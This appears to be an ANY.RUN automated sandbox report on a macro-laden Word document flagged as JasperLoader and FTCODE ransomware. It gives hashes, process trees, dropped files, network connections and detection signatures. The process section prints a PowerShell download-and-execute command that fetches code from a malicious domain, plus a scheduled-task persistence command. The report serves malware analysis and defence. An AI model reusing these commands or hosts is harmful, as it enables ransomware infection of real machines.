analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Nuovo_documento_21.doc

Full analysis: https://app.any.run/tasks/a31fc340-da9c-4b1f-a49f-bc5cfe25f30c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 14, 2019, 13:01:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
loader
jasper
ransomware
ftcode
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Fri Oct 11 18:18:00 2019, Last Saved Time/Date: Mon Oct 14 19:08:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

2506D0627C8F1281CC8267CB32DE81F0

SHA1:

164A0300F45721B76B9363AD6C850D50DB66DD6E

SHA256:

0E7AC4D933C34EC3399B2AA822A15C94160709864CFB34695C14478E03056B28

SSDEEP:

3072:PvaU+HscWycwdtQNclQdIkIqWDEcAbCGB74/DIk5S+3:Xa1shhwoNclQbIqWDEcAmS4rIKJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Writes to a start menu file

      • powershell.exe (PID: 4060)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3512)
    • JASPER was detected

      • powershell.exe (PID: 4060)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 4060)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 1596)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1596)
    • FTCODE was detected

      • powershell.exe (PID: 4060)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 4060)
    • Executed via COM

      • DllHost.exe (PID: 1952)
      • DllHost.exe (PID: 3088)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1596)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1596)
      • WINWORD.EXE (PID: 3248)
      • WINWORD.EXE (PID: 792)
    • Manual execution by user

      • WINWORD.EXE (PID: 3248)
      • WINWORD.EXE (PID: 792)
      • explorer.exe (PID: 3600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Administrator
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: Administrator
RevisionNumber: 3
Software: Microsoft Office Word
TotalEditTime: 3.0 minutes
CreateDate: 2019:10:11 17:18:00
ModifyDate: 2019:10:14 18:08:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
8
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs #JASPER powershell.exe schtasks.exe no specs explorer.exe no specs PhotoViewer.dll no specs winword.exe no specs winword.exe no specs PhotoViewer.dll no specs

Process information

PID
CMD
Path
Indicators
Parent process
1596"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Nuovo_documento_21.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4060"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://abby.abbyehughes.com/?need=stafhxt&vid=dpec10&90701'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3512"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 16 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3600"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1952C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3248"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Documents\incworld.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
792"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Documents\resourcelocations.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3088C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 510
Read events
2 223
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
7
Unknown types
9

Dropped files

PID
Process
Filename
Type
1596WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB4C4.tmp.cvr
MD5:
SHA256:
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\45TUTXFAL2PRZ8IHKE1B.temp
MD5:
SHA256:
3248WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR61AD.tmp.cvr
MD5:
SHA256:
792WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7535.tmp.cvr
MD5:
SHA256:
1596WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{933988B5-2166-462A-BEA2-92D2D877BB65}.tmp
MD5:
SHA256:
4060powershell.exeC:\Users\Public\Libraries\WindowsIndexingService.vbstext
MD5:C5DA6266AA4E77B16E3E10F4F07B0EB6
SHA256:905DD783A583DA50857C1F84BF8EAACCC4338EB004F3E13FC409BF28EDAA87B7
1596WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8B378DCC62035BBABEF8B1C2A131A338
SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1596WINWORD.EXEC:\Users\admin\Documents\~$cworld.rtfpgc
MD5:9E4EF92DEE7EF09D21EFCD4C15C6C637
SHA256:7715300D1F09150B05998BF2D0AB387A782CF41B3291021CE26420477C5B4B19
4060powershell.exeC:\Users\Public\Libraries\268922text
MD5:C5DA6266AA4E77B16E3E10F4F07B0EB6
SHA256:905DD783A583DA50857C1F84BF8EAACCC4338EB004F3E13FC409BF28EDAA87B7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4060
powershell.exe
GET
200
185.189.151.22:80
http://abby.abbyehughes.com/?need=aegzfej&vid=dpec10&
CH
text
80.1 Kb
malicious
4060
powershell.exe
GET
200
185.189.151.22:80
http://abby.abbyehughes.com/?need=stafhxt&vid=dpec10&90701
CH
text
9.32 Kb
malicious
4060
powershell.exe
POST
200
185.158.249.55:80
http://connect.contractorquote.info/
NL
text
13 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4060
powershell.exe
185.158.249.55:80
connect.contractorquote.info
easystores GmbH
NL
malicious
4060
powershell.exe
185.189.151.22:80
abby.abbyehughes.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
abby.abbyehughes.com
  • 185.189.151.22
malicious
connect.contractorquote.info
  • 185.158.249.55
malicious

Threats

PID
Process
Class
Message
4060
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] JasperLoader Obfuscation
4060
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Ransom.PowerShell.Ftcode.A!MSR
1 ETPRO signatures available at the full report
No debug info